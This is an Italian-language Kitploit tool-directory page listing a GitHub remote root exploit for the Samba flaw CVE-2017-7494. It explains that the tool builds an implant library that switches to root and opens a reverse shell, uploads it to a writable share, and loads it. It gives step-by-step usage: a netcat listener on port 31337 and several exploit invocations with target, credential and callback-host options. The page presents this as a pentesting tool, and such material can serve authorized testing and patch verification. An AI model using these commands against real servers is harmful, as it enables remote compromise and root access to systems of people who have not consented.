Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-7494 — Exploit remoto di root per la vulnerabilità SAMBA CVE-2017-7494 | Kitploit
Strumenti/GitHubGitHub/joxeankoret/cve-2017-7494
Generazione di PayloadAnalisi delle VulnerabilitàExploitShellcodePenetration TestingStrumento di Accesso RemotoArchived
GitHubjoxeankoret/cve-2017-7494

CVE-2017-7494

Exploit remoto di root per la vulnerabilità SAMBA CVE-2017-7494

Vedi Repository
259745 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2017-7494

Exploit remoto per root per la vulnerabilità SAMBA CVE-2017-7494.

Dettagli

Questo exploit è diviso in 2 parti:

  • Prima, compila un payload chiamato "implant.c" e genera una libreria (libimplantx32.so o libimplantx64.so) che passa all'utente root, si stacca dal processo genitore e avvia una reverse shell.
  • Secondo, trova una condivisione scrivibile nell'host target specificato, carica la libreria con un nome casuale e prova a caricarla.

Finché il target è vulnerabile e il payload è corretto per il sistema operativo e l'architettura del target, l'exploit è affidabile al 100%.

Come usare

Sulla tua macchina, esegui il seguente comando:

root@kitploit:~
$ nc -p 31337 -l

Quindi, esegui l'exploit contro il tuo target e attendi che si connetta di nuovo al tuo Netcat:

root@kitploit:~
$ python cve_2017_7494.py -t target_ip

Se chiudi troppo velocemente la reverse shell, invece di eseguire di nuovo l'exploit caricando il modulo, ecc... puoi semplicemente passare il percorso del modulo già caricato. Supponendo che sia stato caricato in /shared/directory/ come "module.so", eseguirai un comando come il seguente:

root@kitploit:~
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so

AGGIORNAMENTO 11/25/2017 - Archivaldo

Ora puoi eseguire l'exploit contro samba 3.5.0 e 3.6.0, basta aggiungere l'argomento -o 1

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1 

Ora puoi usare il tuo custom .so

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so

Nel caso in cui tu debba eseguire questo script da una macchina x86, la compilazione dei binari implant creerà due file x86. Usando il flag -n 1 puoi disabilitare la compilazione e copiare libimplantx64.so da un'altra macchina.

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

Nel caso in cui samba giri solo sulla porta 139. Puoi impostare la porta del server remoto usando l'argomento -p

root@kitploit:~
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

NOTE

Non lo supporto più.

-- Joxean Koret

Scarica lo strumento